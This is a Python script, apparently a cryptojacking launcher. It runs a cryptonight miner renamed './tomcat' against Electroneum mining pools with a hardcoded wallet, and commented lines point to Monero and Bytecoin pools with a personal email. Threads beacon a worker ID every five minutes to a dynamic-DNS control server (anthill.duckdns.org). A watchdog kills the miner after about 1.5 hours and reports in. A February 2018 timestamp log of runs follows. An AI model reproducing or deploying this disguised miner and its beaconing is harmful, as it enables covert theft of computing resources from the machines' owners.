import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:55:06.895890
#2018-02-17 16:43:06.228478
#2018-02-17 18:31:05.318222
#2018-02-17 20:19:04.368794
#2018-02-17 22:05:07.129900
#2018-02-17 23:49:01.448868
#2018-02-18 01:39:03.910584
#2018-02-18 03:26:04.223477
#2018-02-18 05:15:08.457768
#2018-02-18 07:08:06.242917
#2018-02-18 08:56:07.105673
#2018-02-18 10:43:06.351092
#2018-02-18 12:29:03.879033
#2018-02-18 14:17:04.281238
#2018-02-18 16:08:05.223006
#2018-02-18 17:56:06.699791
#2018-02-18 19:43:07.522334
#2018-02-18 21:28:05.020101
#2018-02-18 23:17:01.490917
#2018-02-19 01:04:01.466714
#2018-02-19 02:51:02.118872
#2018-02-19 04:38:01.337131
#2018-02-19 06:22:07.656614
#2018-02-19 08:11:06.498395
#2018-02-19 10:01:06.938164
#2018-02-19 11:50:06.267839
#2018-02-19 13:37:03.954308
#2018-02-19 15:24:05.507805
#2018-02-19 17:13:04.531748
#2018-02-19 19:01:01.710231
#2018-02-19 20:46:07.613868
#2018-02-19 22:34:08.089865
#2018-02-20 00:19:07.846346
#2018-02-20 02:07:05.582040
#2018-02-20 03:56:06.169549
#2018-02-20 05:39:02.135245
#2018-02-20 07:24:05.913903
#2018-02-20 09:10:10.766151
#2018-02-20 10:53:04.610351
#2018-02-20 12:42:08.218299
#2018-02-20 14:28:01.740894
#2018-02-20 16:14:10.605046
#2018-02-20 17:59:09.127014
#2018-02-20 19:52:04.484291
#2018-02-20 21:39:07.023295
#2018-02-20 23:22:04.548866
#2018-02-21 01:08:06.306026
#2018-02-21 02:55:01.359646
#2018-02-21 04:45:05.039348
#2018-02-21 06:34:03.836324
#2018-02-21 08:19:04.948948
#2018-02-21 10:05:09.087856
#2018-02-21 11:53:08.875004
#2018-02-21 13:45:07.443996
#2018-02-21 15:34:04.640279
#2018-02-21 17:24:10.383374
#2018-02-21 19:13:01.519891
#2018-02-21 20:59:07.634239
#2018-02-21 22:46:06.837836
#2018-02-22 00:34:06.385619
#2018-02-22 02:23:05.592269
#2018-02-22 04:09:06.876033
#2018-02-22 05:54:01.352945
#2018-02-22 07:40:06.811772
#2018-02-22 09:28:05.235932
#2018-02-22 11:15:06.883600
#2018-02-22 13:00:11.169539
#2018-02-22 14:49:05.549357
#2018-02-22 16:35:10.555312
#2018-02-22 18:20:09.730019
#2018-02-22 20:12:07.725962
#2018-02-22 21:58:05.765436
#2018-02-22 23:45:04.074479
#2018-02-23 01:34:04.145823
#2018-02-23 03:20:09.671543
#2018-02-23 05:06:05.972777
#2018-02-23 06:51:06.161206
#2018-02-23 08:44:06.595486
#2018-02-23 11:02:03.944834
#2018-02-23 12:58:07.744363
#2018-02-23 14:43:02.227787
#2018-02-23 16:31:08.249810
#2018-02-23 18:19:08.426119
#2018-02-23 20:05:10.092060
#2018-02-23 21:54:07.963765
#2018-02-23 23:44:07.540578
#2018-02-24 01:37:08.238590
#2018-02-24 03:26:05.178927
#2018-02-24 05:11:01.487635
#2018-02-24 06:59:05.860251
#2018-02-24 08:50:06.685719
#2018-02-24 10:55:02.836874
#2018-02-24 12:42:06.806424
#2018-02-24 14:31:06.200976
#2018-02-24 16:18:07.242792
#2018-02-24 18:12:06.765210
#2018-02-24 19:58:06.428995
#2018-02-24 21:42:06.082656
#2018-02-25 00:36:05.191637
#2018-02-25 03:32:07.267306
#2018-02-25 07:21:04.338014